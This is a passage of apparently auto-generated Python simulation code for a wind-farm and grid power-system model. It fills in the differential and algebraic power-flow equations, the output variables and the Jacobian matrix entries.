        struct[0].f[0,0] = -K_delta_GRID*delta_GRID + Omega_b_GRID*(omega_GRID - omega_coi)
        struct[0].f[1,0] = -i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) - i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)) + p_m_GRID
        struct[0].f[2,0] = (K_q_GRID*(-q_g_GRID + q_ref_GRID) - e_qv_GRID + v_ref_GRID)/T_v_GRID
        struct[0].f[3,0] = 1 - omega_coi
    # Algebraic equations:
    if mode == 3:
        # Pre-fill g with the linear contribution Gy_ini @ y_ini; rows that
        # are not overwritten below (e.g. row 28, omega_coi) keep this value.
        struct[0].g[:,:] = np.ascontiguousarray(struct[0].Gy_ini) @ np.ascontiguousarray(struct[0].y_ini)
        struct[0].g[0,0] = -P_W1lv/S_base + V_W1lv**2*g_W1mv_W1lv + V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
        struct[0].g[1,0] = -Q_W1lv/S_base + V_W1lv**2*(-b_W1mv_W1lv - bs_W1mv_W1lv/2) + V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
        struct[0].g[2,0] = -P_W2lv/S_base + V_W2lv**2*g_W2mv_W2lv + V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
        struct[0].g[3,0] = -Q_W2lv/S_base + V_W2lv**2*(-b_W2mv_W2lv - bs_W2mv_W2lv/2) + V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
        struct[0].g[4,0] = -P_W3lv/S_base + V_W3lv**2*g_W3mv_W3lv + V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
        struct[0].g[5,0] = -Q_W3lv/S_base + V_W3lv**2*(-b_W3mv_W3lv - bs_W3mv_W3lv/2) + V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
        struct[0].g[6,0] = -P_STlv/S_base + V_STlv**2*g_STmv_STlv + V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
        struct[0].g[7,0] = -Q_STlv/S_base + V_STlv**2*(-b_STmv_STlv - bs_STmv_STlv/2) + V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
        struct[0].g[8,0] = -P_W1mv/S_base + V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + V_W1mv**2*(g_W1mv_W1lv + g_W1mv_W2mv) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
        struct[0].g[9,0] = -Q_W1mv/S_base + V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + V_W1mv**2*(-b_W1mv_W1lv - b_W1mv_W2mv - bs_W1mv_W1lv/2 - bs_W1mv_W2mv/2) + V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
        struct[0].g[10,0] = -P_W2mv/S_base + V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + V_W2mv**2*(g_W1mv_W2mv + g_W2mv_W2lv + g_W2mv_W3mv) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
        struct[0].g[11,0] = -Q_W2mv/S_base + V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + V_W2mv**2*(-b_W1mv_W2mv - b_W2mv_W2lv - b_W2mv_W3mv - bs_W1mv_W2mv/2 - bs_W2mv_W2lv/2 - bs_W2mv_W3mv/2) + V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
        struct[0].g[12,0] = -P_W3mv/S_base + V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv)) + V_W3mv**2*(g_W2mv_W3mv + g_W3mv_POImv + g_W3mv_W3lv)
        struct[0].g[13,0] = -Q_W3mv/S_base + V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv)) + V_W3mv**2*(-b_W2mv_W3mv - b_W3mv_POImv - b_W3mv_W3lv - bs_W2mv_W3mv/2 - bs_W3mv_POImv/2 - bs_W3mv_W3lv/2)
        struct[0].g[14,0] = -P_POImv/S_base + V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + V_POImv**2*(g_POI_POImv + g_STmv_POImv + g_W3mv_POImv) + V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
        struct[0].g[15,0] = -Q_POImv/S_base + V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv)) + V_POImv**2*(-b_POI_POImv - b_STmv_POImv - b_W3mv_POImv - bs_POI_POImv/2 - bs_STmv_POImv/2 - bs_W3mv_POImv/2) + V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
        struct[0].g[16,0] = -P_STmv/S_base + V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv)) + V_STmv**2*(g_STmv_POImv + g_STmv_STlv)
        struct[0].g[17,0] = -Q_STmv/S_base + V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv)) + V_STmv**2*(-b_STmv_POImv - b_STmv_STlv - bs_STmv_POImv/2 - bs_STmv_STlv/2)
        struct[0].g[18,0] = -P_POI/S_base + V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + V_POI**2*(g_POI_GRID + g_POI_POImv) + V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
        struct[0].g[19,0] = -Q_POI/S_base + V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI)) + V_POI**2*(-b_POI_GRID - b_POI_POImv - bs_POI_GRID/2 - bs_POI_POImv/2) + V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
        struct[0].g[20,0] = -P_GRID/S_base + V_GRID**2*g_POI_GRID + V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) - S_n_GRID*p_g_GRID/S_base
        struct[0].g[21,0] = -Q_GRID/S_base + V_GRID**2*(-b_POI_GRID - bs_POI_GRID/2) + V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI)) - S_n_GRID*q_g_GRID/S_base
        struct[0].g[22,0] = K_p_GRID*(-i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) - i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)) + p_m_GRID + xi_p_GRID/T_p_GRID) - omega_GRID + 1
        struct[0].g[23,0] = -R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID) + X_v_GRID*i_q_GRID
        struct[0].g[24,0] = -R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID) - X_v_GRID*i_d_GRID + e_qv_GRID
        struct[0].g[25,0] = V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID) - p_g_GRID
        struct[0].g[26,0] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID) - q_g_GRID
        struct[0].g[27,0] = K_sec_GRID*p_agc + p_c_GRID - p_m_GRID - (omega_GRID - omega_ref_GRID)/Droop_GRID
        # Row 28 (omega_coi) is intentionally not overwritten: it is linear
        # and keeps the value from the Gy_ini @ y_ini pre-fill above.
        struct[0].g[29,0] = K_i_agc*xi_freq + K_p_agc*(1 - omega_coi) - p_agc
    # Outputs:
    if mode == 3:
        struct[0].h[0,0] = V_W1lv
        struct[0].h[1,0] = V_W2lv
        struct[0].h[2,0] = V_W3lv
        struct[0].h[3,0] = V_STlv
        struct[0].h[4,0] = V_W1mv
        struct[0].h[5,0] = V_W2mv
        struct[0].h[6,0] = V_W3mv
        struct[0].h[7,0] = V_POImv
        struct[0].h[8,0] = V_STmv
        struct[0].h[9,0] = V_POI
        struct[0].h[10,0] = V_GRID
        struct[0].h[11,0] = i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) + i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID))
    # Jacobian df/dx (only state-dependent entries are updated here;
    # constant entries are presumably pre-initialized elsewhere — confirm).
    if mode == 10:
        struct[0].Fx_ini[0,0] = -K_delta_GRID
        struct[0].Fx_ini[1,0] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
        struct[0].Fx_ini[2,2] = -1/T_v_GRID
    # Jacobians df/dy, dg/dx and dg/dy:
    if mode == 11:
        struct[0].Fy_ini[0,22] = Omega_b_GRID
        struct[0].Fy_ini[0,28] = -Omega_b_GRID
        struct[0].Fy_ini[1,20] = -i_d_GRID*sin(delta_GRID - theta_GRID) - i_q_GRID*cos(delta_GRID - theta_GRID)
        struct[0].Fy_ini[1,21] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
        struct[0].Fy_ini[1,23] = -2*R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID)
        struct[0].Fy_ini[1,24] = -2*R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID)
        struct[0].Fy_ini[1,27] = 1
        struct[0].Fy_ini[2,26] = -K_q_GRID/T_v_GRID
        struct[0].Fy_ini[3,28] = -1
        struct[0].Gx_ini[22,0] = K_p_GRID*(-V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID))
        struct[0].Gx_ini[22,1] = K_p_GRID/T_p_GRID
        struct[0].Gx_ini[23,0] = -V_GRID*cos(delta_GRID - theta_GRID)
        struct[0].Gx_ini[24,0] = V_GRID*sin(delta_GRID - theta_GRID)
        struct[0].Gx_ini[24,2] = 1
        struct[0].Gx_ini[25,0] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
        struct[0].Gx_ini[26,0] = -V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID)
        struct[0].Gx_ini[29,3] = K_i_agc
        struct[0].Gy_ini[0,0] = 2*V_W1lv*g_W1mv_W1lv + V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
        struct[0].Gy_ini[0,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
        struct[0].Gy_ini[0,8] = V_W1lv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
        struct[0].Gy_ini[0,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
        struct[0].Gy_ini[1,0] = 2*V_W1lv*(-b_W1mv_W1lv - bs_W1mv_W1lv/2) + V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
        struct[0].Gy_ini[1,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
        struct[0].Gy_ini[1,8] = V_W1lv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
        struct[0].Gy_ini[1,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
        struct[0].Gy_ini[2,2] = 2*V_W2lv*g_W2mv_W2lv + V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
        struct[0].Gy_ini[2,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
        struct[0].Gy_ini[2,10] = V_W2lv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
        struct[0].Gy_ini[2,11] = V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
        struct[0].Gy_ini[3,2] = 2*V_W2lv*(-b_W2mv_W2lv - bs_W2mv_W2lv/2) + V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
        struct[0].Gy_ini[3,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
        struct[0].Gy_ini[3,10] = V_W2lv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
        struct[0].Gy_ini[3,11] = V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
        struct[0].Gy_ini[4,4] = 2*V_W3lv*g_W3mv_W3lv + V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
        struct[0].Gy_ini[4,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
        struct[0].Gy_ini[4,12] = V_W3lv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
        struct[0].Gy_ini[4,13] = V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
        struct[0].Gy_ini[5,4] = 2*V_W3lv*(-b_W3mv_W3lv - bs_W3mv_W3lv/2) + V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
        struct[0].Gy_ini[5,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
        struct[0].Gy_ini[5,12] = V_W3lv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
        struct[0].Gy_ini[5,13] = V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
        struct[0].Gy_ini[6,6] = 2*V_STlv*g_STmv_STlv + V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
        struct[0].Gy_ini[6,7] = V_STlv*V_STmv*(-b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
        struct[0].Gy_ini[6,16] = V_STlv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
        struct[0].Gy_ini[6,17] = V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
        struct[0].Gy_ini[7,6] = 2*V_STlv*(-b_STmv_STlv - bs_STmv_STlv/2) + V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
        struct[0].Gy_ini[7,7] = V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
        struct[0].Gy_ini[7,16] = V_STlv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
        struct[0].Gy_ini[7,17] = V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) + g_STmv_STlv*cos(theta_STlv - theta_STmv))
        struct[0].Gy_ini[8,0] = V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
        struct[0].Gy_ini[8,1] = V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
        struct[0].Gy_ini[8,8] = V_W1lv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + 2*V_W1mv*(g_W1mv_W1lv + g_W1mv_W2mv) + V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
        struct[0].Gy_ini[8,9] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
        struct[0].Gy_ini[8,10] = V_W1mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
        struct[0].Gy_ini[8,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
        struct[0].Gy_ini[9,0] = V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
        struct[0].Gy_ini[9,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
        struct[0].Gy_ini[9,8] = V_W1lv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + 2*V_W1mv*(-b_W1mv_W1lv - b_W1mv_W2mv - bs_W1mv_W1lv/2 - bs_W1mv_W2mv/2) + V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
        struct[0].Gy_ini[9,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
        struct[0].Gy_ini[9,10] = V_W1mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
        struct[0].Gy_ini[9,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
        struct[0].Gy_ini[10,2] = V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
        struct[0].Gy_ini[10,3] = V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
        struct[0].Gy_ini[10,8] = V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
        struct[0].Gy_ini[10,9] = V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
        struct[0].Gy_ini[10,10] = V_W1mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + 2*V_W2mv*(g_W1mv_W2mv + g_W2mv_W2lv + g_W2mv_W3mv) + V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
        struct[0].Gy_ini[10,11] = V_W1mv*V_W2mv*(-b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(-b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
        struct[0].Gy_ini[10,12] = V_W2mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
        struct[0].Gy_ini[10,13] = V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
        struct[0].Gy_ini[11,2] = V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
        struct[0].Gy_ini[11,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
        struct[0].Gy_ini[11,8] = V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
        struct[0].Gy_ini[11,9] = V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
        struct[0].Gy_ini[11,10] = V_W1mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + 2*V_W2mv*(-b_W1mv_W2mv - b_W2mv_W2lv - b_W2mv_W3mv - bs_W1mv_W2mv/2 - bs_W2mv_W2lv/2 - bs_W2mv_W3mv/2) + V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
        struct[0].Gy_ini[11,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
        struct[0].Gy_ini[11,12] = V_W2mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
        struct[0].Gy_ini[11,13] = V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
        struct[0].Gy_ini[12,4] = V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
        struct[0].Gy_ini[12,5] = V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
        struct[0].Gy_ini[12,10] = V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
        struct[0].Gy_ini[12,11] = V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
        struct[0].Gy_ini[12,12] = V_POImv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv)) + 2*V_W3mv*(g_W2mv_W3mv + g_W3mv_POImv + g_W3mv_W3lv)
        struct[0].Gy_ini[12,13] = V_POImv*V_W3mv*(-b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(-b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
        struct[0].Gy_ini[12,14] = V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
